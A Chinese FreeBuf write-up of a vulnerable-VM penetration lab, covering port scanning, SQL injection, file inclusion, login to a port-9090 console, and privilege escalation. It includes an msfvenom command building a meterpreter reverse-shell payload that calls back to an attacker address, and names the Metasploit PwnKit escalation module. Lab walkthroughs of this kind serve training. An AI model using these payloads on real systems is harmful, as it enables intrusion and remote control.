freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

M87
2024-04-28 15:21:26

信息收集

图片.png

端口号服务版本
22ssh
80httpApache httpd 2.4.38 ((Debian))
9090ssl/zeus-admin

目录爆破

图片.png

80端口:
图片.png

/admin
图片.png

/admin/backup
图片.png

FUZZ

对admin路径进行fuzz
图片.png

发现一个id参数

尝试sql注入
图片.png

因为是靶机,所以我直接dump
图片.png
图片.png

获取到一系列的用户名和密码

尝试一遍发现,都不能登陆成功

尝试对admin/backup进行fuzz
图片.png

同样可以获取到id和file

发现file我们尝试文件包含漏洞

发现用户名
图片.png
尝试使用这个用户名和之前爆破出来的密码进行登录

但是发现admin页面未响应
图片.png

80端口主页面也未响应
图片.png

admin/backup也仍未相应
图片.png

突破边界

查看9090端口(用户名charlotte,密码15The4Dm1n4L1f3)
图片.png

可以成功登录,且发现存在一个终端页面
图片.png

查看charlotte当前可用权限
图片.png

并不在sudoers中
图片.png

查看有无可利用的root权限指令
图片.png

但是因为当前用户并没在sudoer中,故无法使用命令提权

提权方法1:

使用msf模块进行漏洞检测并提权

尝试内核提权

生成linux后门文件

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.170 LPORT=5555 -f elf -o shell.elf

具体提权模块:

exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

注:该提权方法我就成功了一次,第二次怎么也连不上了
1540005767146.gif

提权方法2:

old
图片.png

图片.png
图片.png
图片.png

# 渗透测试 # 网络安全
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者